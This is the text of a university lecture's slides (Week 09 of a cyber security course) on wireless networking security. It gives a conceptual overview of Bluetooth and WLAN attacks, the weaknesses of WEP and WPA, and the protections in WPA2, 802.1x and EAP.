Cyber Security

Week 09
Professor Tahir Sabtain Syed
Introduction
 Wireless data communications have
revolutionized computer networking
 Wireless data networks found virtually everywhere
 Wireless networks have been targets for
attackers
 Early wireless networking standards had
vulnerabilities
 Changes in wireless network security yielded security
comparable to wired networks

2
Wireless Attacks
 Bluetooth
 Wireless technology
 Uses short-range radio frequency transmissions
 Provides for rapid, ad-hoc device pairings
 Example: smartphone and Bluetooth headphones
 Personal Area Network (PAN) technology
 Two types of Bluetooth network topologies
 Piconet
 Scatternet

3
Wireless Attacks (cont’d.)
 Piconet
 Established when two Bluetooth devices come within
range of each other
 One device (master) controls all wireless traffic
 Other device (slave) takes commands
 Active slaves can send transmissions
 Parked slaves are connected but not actively participating

4
Bluetooth piconet

5
Wireless Attacks (cont’d.)
 Scatternet
 Group of piconets with connections between
different piconets
 Bluejacking
 Attackthat sends unsolicited messages to Bluetooth-
enabled devices
 Text messages, images, or sounds
 Considered more annoying than harmful
 No data is stolen
 http://www.youtube.com/watch?v=ajo0njlklYo

6
Figure Bluetooth scatternet

7
Wireless Attacks (cont’d.)
 Bluesnarfing
 Unauthorized access to wireless information through
a Bluetooth connection
 Often between cell phones and laptops
 Attacker copies e-mails, contacts, or other data by
connecting to the Bluetooth device without owner’s
knowledge
 http://www.youtube.com/watch?v=KfZ7Ek409LM
 http://www.youtube.com/watch?v=AwoEflxJPzE

8
Wireless LAN Attacks
 Institute of Electrical and Electronics Engineers
(IEEE)
 Most influential organization for computer networking
and wireless communications
 Dates back to 1884
 Began developing network architecture standards in
the 1980s
 1997: release of IEEE 802.11
 Standard for wireless local area networks (WLANs)
 Higher speeds added in 1999: IEEE 802.11b

9
Wireless LAN Attacks (cont’d.)
 IEEE 802.11a
 Specifies
maximum rated speed of 54Mbps using the
5GHz spectrum
 IEEE 802.11g
 Preserves stable and widely accepted features of
802.11b
 Increases data transfer rates similar to 802.11a

 IEEE 802.11n
 Ratified in 2009

10
Wireless LAN Attacks (cont’d.)
 Improvements in IEEE 802.11n
 Speed – up to 600Mbps
 Coverage area – double a, b, g
 Interference – different frequencies
 Security – high level encryption required

 Wireless client network interface card adapter

 Performs same functions as wired adapter
 Antenna sends and receives signals

11
Wireless LAN Attacks (cont’d.)
 Access point (AP) major parts
 Antenna and radio transmitter/receiver send and
receive wireless signals
 Bridging software to interface wireless devices to
other devices
 Wired network interface allows it to connect by cable
to standard wired network
 AP functions
 Acts as “base station” for wireless network

12
Figure Access point

13
Wireless LAN Attacks (cont’d.)
 AP functions (cont’d.)
 Actsas a bridge between wireless and wired
networks
 Can connect to wired network by a cable
 Autonomous access points
 Separate from other network devices and access
points
 Have necessary “intelligence” for wireless
authentication, encryption, and management

14
Wireless LAN Attacks (cont’d.)
 Wireless broadband routers
 Singlehardware device containing AP, firewall, router,
and DHCP server
 Wireless networks have been vulnerable targets
for attackers
 Not restricted to a cable
 Types of wireless LAN attacks
 Discovering the network
 Attacks through the RF spectrum
 Attacks involving access points

15
Wireless LAN Attacks (cont’d.)
 Discovering the network
 One of first steps in attack is to discover presence of
a network
 Beaconing
 AP sends signal at regular intervals to announce its
presence and provide connection information
 Wireless device scans for beacon frames
 http://www.youtube.com/watch?v=rGYy1F1fhjc

 War driving
 Process of passive discovery of wireless network
locations
16
Wireless LAN Attacks (cont’d.)
 War chalking
 Documenting and then advertising location of wireless
LANs for others to use
 Previously done by drawing on sidewalks or walls
around network area
 Today, locations are posted on Web sites

 http://www.youtube.com/watch?v=2rM-K6SQTiU

17
Table War chalking symbols

18
Wireless LAN Attacks (cont’d.)
 Attacks through the RF (Radio Frequency)
spectrum
 Wirelessprotocol analyzer
 Generating interference

 Wireless protocol analyzer

 Wireless traffic captured to decode and analyze
packet contents
 Network interface card (NIC) adapter must be in
correct mode (Monitor Mode)
 Kismet, Airmon, Wireshark

19
 Wireless LAN Attacks (cont’d.)
 Attacks using access points
 Rogue access points – installed by internal user
 Evil twin – installed by hacker

 Rogue access point

 Unauthorized access point that allows attacker to bypass
network security configurations
 May be set up behind a firewall, opening the network to
attacks

20
Figure Rogue access point

21
 Wireless LAN Attacks (cont’d.)

 Evil twin
 AP set up by an attacker
 Attempts to mimic an authorized AP
 Attackers capture transmissions from users to evil twin
AP

22
Vulnerabilities of IEEE 802.11 Security
 Original IEEE 802.11 committee recognized
wireless transmissions could be vulnerable
 Implemented several wireless security protections in
the standard
 Left others to WLAN vendor’s discretion
 Protections were vulnerable and led to multiple
attacks

23
MAC Address Filtering
 Method of controlling WLAN access
 Limit a device’s access to AP
 Media Access Control (MAC) address filtering
 Used by nearly all wireless AP vendors
 Permits or blocks device based on MAC address

 Vulnerabilities of MAC address filtering

 Addresses exchanged in unencrypted format
 Attacker can see address of approved device and
substitute it on his own device
 Managing large number of addresses is challenging

24
Figure MAC address filtering

25
SSID Broadcast
 Each device must be authenticated prior to
connecting to the WLAN
 Open system authentication
 Device discovers wireless network and sends
association request frame to AP
 Frame carries Service Set Identifier (SSID)
 User-supplied network name
 Can be any alphanumeric string 2-32 characters long
 AP compares SSID with actual SSID of network
 If the two match, wireless device is authenticated

26
Figure: Open system authentication

27
SSID Broadcast (cont’d.)
 Open system authentication is weak
 Based only on match of SSIDs
 Attacker can wait for the SSID to be broadcast by the
AP
 Users can configure APs to prevent beacon
frame from including the SSID
 Provides only a weak degree of security
 Can be discovered when transmitted in other frames
 Older versions of Windows XP have an added
vulnerability if this approach is used

28
Wired Equivalent Privacy (WEP)
 IEEE 802.11 security protocol
 Encrypts plaintext into ciphertext
 Secret key is shared between wireless client
device and AP
 Key used to encrypt and decrypt packets
 WEP vulnerabilities
 WEP can only use 64-bit or 128-bit number to encrypt
 Initialization vector (IV) is only 24 of those bits
 Short length makes it easier to break

29
Wired Equivalent Privacy (cont’d.)
 WEP vulnerabilities (cont’d.)
 Violatescardinal rule of cryptography: avoid a
detectable pattern
 Attackers can see duplication when IVs start
repeating
 Keystream attack (or IV attack)
 Attacker
identifies two packets derived from same IV
 Uses XOR to discover plaintext

30
Figure : XOR operations

31
Figure 8-11 Capturing packets
© Cengage Learning 2012

32
Wireless Security Solutions
 Unified approach to WLAN security was needed
 IEEE and Wi-Fi Alliance began developing security
solutions
 Resulting standards used today
 IEEE802.11i
 WPA and WPA2

33
Wi-Fi Protected Access (WPA)
 Introduced in 2003 by the Wi-Fi Alliance
 A subset of IEEE 802.11i
 Design goal: protect present and future wireless
devices
 Temporal Key Integrity Protocol (TKIP)
Encryption
 Used in WPA
 Uses longer 128 bit key than WEP
 Dynamically generated for each new packet

34
Wi-Fi Protected Access (cont’d.)
 Preshared Key (PSK) Authentication
 AfterAP configured, client device must have same
key value entered
 Key is shared prior to communication taking place
 Uses a passphrase to generate encryption key
 Must be entered on each AP and wireless device in advance
 Not used for encryption
 Serves as starting point for mathematically generating the
encryption keys

35
Wi-Fi Protected Access (cont’d.)
 Vulnerabilities in WPA
 Key management
 Key sharing is done manually without security protection
 Keys must be changed on a regular basis
 Key must be disclosed to guest users
 Passphrases
 PSK passphrases of fewer than 20 characters subject to
cracking

36
Wi-Fi Protected Access 2 (WPA2)
• Second generation of WPA known as WPA2
 Introduced in 2004
 Based on final IEEE 802.11i standard
 Uses Advanced Encryption Standard (AES)
 Supports both PSK and IEEE 802.11x authentication
 AES-CCMP Encryption
 Encryption protocol standard for WPA2
 CCM is algorithm providing data privacy
 CBC-MAC component of CCMP provides data integrity
and authentication

37
Wi-Fi Protected Access 2 (cont’d.)
 AES encryption and decryption
 Shouldbe performed in hardware because of its
computationally intensive nature
 IEEE 802.1x authentication
 Originally developed for wired networks
 Provides greater degree of security by implementing
port security
 Blocks all traffic on a port-by-port basis until client is
authenticated

38
Wi-Fi Protected Access 2 (cont’d.)
 Extensible Authentication Protocol (EAP)
 Framework for transporting authentication protocols
 Defines message format
 Uses four types of packets
 Request
 Response
 Success
 Failure
 Lightweight EAP (LEAP)
 Proprietary method developed by Cisco Systems

39